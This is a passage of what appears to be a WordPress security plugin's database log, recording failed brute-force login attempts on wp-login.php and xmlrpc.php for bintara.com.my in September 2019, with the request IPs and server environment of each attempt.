_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.143.78\";s:11:\"REMOTE_PORT\";s:5:\"58090\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6w6YaPUx8kPlNBlL1IVwAAAFE\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567535337.8965\";s:12:\"REQUEST_TIME\";s:10:\"1567535337\";}}','notice','2019-09-03 18:28:59','2019-09-03 18:28:58',18202344,19501464,'https://bintara.com.my/xmlrpc.php',1,0,'148.66.143.78'),(23639,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"148.66.143.78\";s:11:\"REMOTE_PORT\";s:5:\"57660\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6w57mh4I5iAnitdxglwwAAAQg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567535335.7788\";s:12:\"REQUEST_TIME\";s:10:\"1567535335\";}}','notice','2019-09-03 18:28:57','2019-09-03 18:28:56',17689904,19180664,'https://bintara.com.my/wp-login.php',1,0,'148.66.143.78'),(23638,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"81.177.33.4\";s:11:\"REMOTE_PORT\";s:5:\"39659\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6sGbmh4I5iAnitdxgjVgAAAQ8\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567534105.9518\";s:12:\"REQUEST_TIME\";s:10:\"1567534105\";}}','notice','2019-09-03 18:08:27','2019-09-03 18:08:26',18201360,19501432,'https://bintara.com.my/xmlrpc.php',1,0,'81.177.33.4'),(23637,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"90\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:11:\"81.177.33.4\";s:11:\"REMOTE_PORT\";s:5:\"39291\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6sFtRCUhS5Yos@KbVbtAAAAIE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567534103.045\";s:12:\"REQUEST_TIME\";s:10:\"1567534103\";}}','notice','2019-09-03 18:08:24','2019-09-03 18:08:23',17683704,19174312,'https://bintara.com.my/wp-login.php',1,0,'81.177.33.4'),(23636,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"142.4.213.48\";s:11:\"REMOTE_PORT\";s:5:\"47924\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6n4rmh4I5iAnitdxgh6QAAARU\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567533026.5112\";s:12:\"REQUEST_TIME\";s:10:\"1567533026\";}}','notice','2019-09-03 17:50:27','2019-09-03 17:50:26',18203000,19500488,'https://bintara.com.my/xmlrpc.php',1,0,'142.4.213.48'),(23635,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:61.0.1) Gecko/20120101 Firefox/61.0.1\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:12:\"142.4.213.48\";s:11:\"REMOTE_PORT\";s:5:\"47614\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6n31pDwFftl9khPl3BPwAAAAs\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567533023.6298\";s:12:\"REQUEST_TIME\";s:10:\"1567533023\";}}','notice','2019-09-03 17:50:24','2019-09-03 17:50:23',17684528,19176352,'https://bintara.com.my/wp-login.php',1,0,'142.4.213.48'),(23623,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"171.244.129.66\";s:11:\"REMOTE_PORT\";s:5:\"27899\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6DQ4PBR0Qpy6701fcCdwAAAI0\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1567523651.382\";s:12:\"REQUEST_TIME\";s:10:\"1567523651\";}}','notice','2019-09-03 15:14:13','2019-09-03 15:14:11',17684944,19176536,'https://bintara.com.my/wp-login.php',1,0,'171.244.129.66'),(23624,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"171.244.129.66\";s:11:\"REMOTE_PORT\";s:5:\"19697\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6DRoPBR0Qpy6701fcCegAAAJM\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567523654.3901\";s:12:\"REQUEST_TIME\";s:10:\"1567523654\";}}','notice','2019-09-03 15:14:15','2019-09-03 15:14:14',18202952,19503472,'https://bintara.com.my/xmlrpc.php',1,0,'171.244.129.66'),(23625,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"46.101.168.151\";s:11:\"REMOTE_PORT\";s:5:\"34180\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XW6QlPvBZa9wQiMAqP3c5wAAAEk\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1567527060.5867\";s:12:\"REQUEST_TIME\";s:10:\"1567527060\";}}','notice','2019-09-03 16:11:02','2019-09-03 16:11:01',17684200,19177152,'https://bintara.com.my/wp-login.php',1,0,'46.101.168.151'),(23626,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 